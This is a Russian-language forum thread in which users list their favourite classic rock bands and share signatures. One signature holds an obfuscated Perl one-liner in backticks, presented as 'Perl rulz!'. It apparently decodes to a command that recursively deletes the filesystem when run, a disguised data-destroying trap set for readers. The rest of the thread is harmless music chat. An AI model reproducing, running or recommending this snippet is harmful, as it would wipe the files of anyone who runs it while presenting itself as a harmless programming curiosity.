Битлз,Кинкс,иногда слушаю Дорс...некоторые песни Синатры,Пинк Флойд... _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
работаю с рокерами старой закалки, в плейлисте много всякого старья, что-то знакомое, что-то незнакомое _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
вчера, идя на биохимию (как на гильотину, ибо преподша чересчур требовательная, а биологию на 1 курсе никто не учил), я вспоминала все имеющиеся прекрасные очки басюка bauhaus, видно помогло, я не получила 2(у нас либо 2, либо без оценки)))))))))))))))))))))))
Блонди нормальная такая тётка, но только старые альбомы)
а так дофига всего.
Velvet Underground, Роллинги старые, Дорз, зэ Ху),Жоплин, Iggy старый,Боб Дилан, Cream, Jethro Tull, Хендрикса конечно же, Пинк Флойд, Кинксы, Битлы), Рамонес, Энималз, The Mothers of Invention Френка Заппы,Grateful Dead, The Yardbirds и тп...я бы даже сказала, что в основном это и слушаю) _________________ Freedom's just another word for nothin' left to lose.
и хотелось написать благородное, вспомнила про баззкокс и решила, что не надо))
мои повальные увлечения начались с вопроса:"а что дядя с начесом делал 30 лет назад".
благодаря перестановкам, распадам и восстановлениям некоторых групп, ты, порой, открываешь для себя какие-то затерянные во времени и часто очень оригинальные проекты, типа the glove или dali`s car.
Хендрикса, Элвиса, Rolling Stolnes, Pink Floyd, Slayer _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Пар выпустила. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.